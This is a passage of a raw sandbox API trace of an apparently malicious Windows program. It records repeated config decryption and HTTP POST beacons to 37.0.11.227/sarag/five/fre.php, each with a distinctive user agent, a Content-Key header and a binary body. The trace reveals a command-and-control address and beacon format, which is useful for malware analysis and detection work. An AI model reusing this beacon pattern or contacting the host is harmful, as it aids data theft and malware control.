0x6ad508 [0284.257] GetProcessHeap () returned 0x690000 [0284.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.257] send (s=0x8f8, buf=0x6ad508*, len=242, flags=0) returned 242 [0284.258] send (s=0x8f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0284.258] GetProcessHeap () returned 0x690000 [0284.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0284.258] recv (in: s=0x8f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0284.331] GetProcessHeap () returned 0x690000 [0284.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0284.332] GetProcessHeap () returned 0x690000 [0284.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0284.333] GetProcessHeap () returned 0x690000 [0284.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0284.333] GetProcessHeap () returned 0x690000 [0284.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0284.333] closesocket (s=0x8f8) returned 0 [0284.334] GetProcessHeap () returned 0x690000 [0284.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0284.334] GetProcessHeap () returned 0x690000 [0284.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.334] GetProcessHeap () returned 0x690000 [0284.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0284.334] GetProcessHeap () returned 0x690000 [0284.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0284.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1700) returned 0x8f8 [0284.337] Sleep (dwMilliseconds=0xea60) [0284.339] GetProcessHeap () returned 0x690000 [0284.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0284.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.340] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0284.350] GetProcessHeap () returned 0x690000 [0284.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0284.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.351] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0284.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.352] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.353] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.353] GetProcessHeap () returned 0x690000 [0284.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0284.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.359] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0284.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.360] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.361] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0284.362] GetProcessHeap () returned 0x690000 [0284.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.362] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.363] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.364] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.365] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.365] GetProcessHeap () returned 0x690000 [0284.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0284.365] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.365] GetProcessHeap () returned 0x690000 [0284.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0284.366] GetProcessHeap () returned 0x690000 [0284.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.366] GetProcessHeap () returned 0x690000 [0284.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0284.366] GetProcessHeap () returned 0x690000 [0284.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0284.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.371] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0284.376] GetProcessHeap () returned 0x690000 [0284.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0284.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.377] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0284.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.378] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.379] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.379] GetProcessHeap () returned 0x690000 [0284.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0284.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.380] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0284.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.381] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.382] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0284.382] GetProcessHeap () returned 0x690000 [0284.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.383] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0284.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.384] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0284.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.384] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0284.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.385] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0284.385] GetProcessHeap () returned 0x690000 [0284.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0284.385] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0284.385] GetProcessHeap () returned 0x690000 [0284.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0284.385] socket (af=2, type=1, protocol=6) returned 0x8fc [0284.386] connect (s=0x8fc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0284.409] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0284.409] GetProcessHeap () returned 0x690000 [0284.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0284.409] GetProcessHeap () returned 0x690000 [0284.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0284.409] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.410] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.410] GetProcessHeap () returned 0x690000 [0284.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0284.410] GetProcessHeap () returned 0x690000 [0284.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.411] GetProcessHeap () returned 0x690000 [0284.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0284.411] GetProcessHeap () returned 0x690000 [0284.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0284.411] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.412] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.412] GetProcessHeap () returned 0x690000 [0284.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0284.413] GetProcessHeap () returned 0x690000 [0284.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.413] send (s=0x8fc, buf=0x6ad508*, len=242, flags=0) returned 242 [0284.413] send (s=0x8fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0284.414] GetProcessHeap () returned 0x690000 [0284.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0284.414] recv (in: s=0x8fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0284.485] GetProcessHeap () returned 0x690000 [0284.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0284.486] GetProcessHeap () returned 0x690000 [0284.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0284.486] GetProcessHeap () returned 0x690000 [0284.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0284.487] GetProcessHeap () returned 0x690000 [0284.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0284.487] closesocket (s=0x8fc) returned 0 [0284.488] GetProcessHeap () returned 0x690000 [0284.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0284.488] GetProcessHeap () returned 0x690000 [0284.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.488] GetProcessHeap () returned 0x690000 [0284.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0284.488] GetProcessHeap () returned 0x690000 [0284.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0284.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1708) returned 0x8fc [0284.490] Sleep (dwMilliseconds=0xea60) [0284.492] GetProcessHeap () returned 0x690000 [0284.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0284.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.493] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.501] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0284.522] GetProcessHeap () returned 0x690000 [0284.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0284.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.525] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0284.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.526] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.532] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.532] GetProcessHeap () returned 0x690000 [0284.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0284.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.533] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0284.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.534] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0284.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.535] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0284.535] GetProcessHeap () returned 0x690000 [0284.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.537] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.538] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.539] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.551] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.551] GetProcessHeap () returned 0x690000 [0284.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0284.551] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.552] GetProcessHeap () returned 0x690000 [0284.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0284.553] GetProcessHeap () returned 0x690000 [0284.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.553] GetProcessHeap () returned 0x690000 [0284.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0284.553] GetProcessHeap () returned 0x690000 [0284.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0284.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.572] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0284.580] GetProcessHeap () returned 0x690000 [0284.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0284.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.581] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0284.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.582] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.582] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.582] GetProcessHeap () returned 0x690000 [0284.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0284.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.584] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0284.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.585] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.586] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0284.586] GetProcessHeap () returned 0x690000 [0284.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.587] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0284.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.588] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0284.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.589] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0284.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.593] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0284.593] GetProcessHeap () returned 0x690000 [0284.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0284.593] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0284.593] GetProcessHeap () returned 0x690000 [0284.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0284.593] socket (af=2, type=1, protocol=6) returned 0x900 [0284.594] connect (s=0x900, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0284.621] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0284.621] GetProcessHeap () returned 0x690000 [0284.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0284.621] GetProcessHeap () returned 0x690000 [0284.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0284.621] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.622] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.622] GetProcessHeap () returned 0x690000 [0284.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0284.622] GetProcessHeap () returned 0x690000 [0284.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.623] GetProcessHeap () returned 0x690000 [0284.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0284.623] GetProcessHeap () returned 0x690000 [0284.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0284.624] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.624] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.624] GetProcessHeap () returned 0x690000 [0284.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0284.625] GetProcessHeap () returned 0x690000 [0284.625] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.625] send (s=0x900, buf=0x6ad508*, len=242, flags=0) returned 242 [0284.626] send (s=0x900, buf=0x6aba40*, len=159, flags=0) returned 159 [0284.626] GetProcessHeap () returned 0x690000 [0284.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0284.626] recv (in: s=0x900, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0284.712] GetProcessHeap () returned 0x690000 [0284.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0284.713] GetProcessHeap () returned 0x690000 [0284.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0284.714] GetProcessHeap () returned 0x690000 [0284.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0284.714] GetProcessHeap () returned 0x690000 [0284.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0284.714] closesocket (s=0x900) returned 0 [0284.715] GetProcessHeap () returned 0x690000 [0284.715] HeapFree (in: 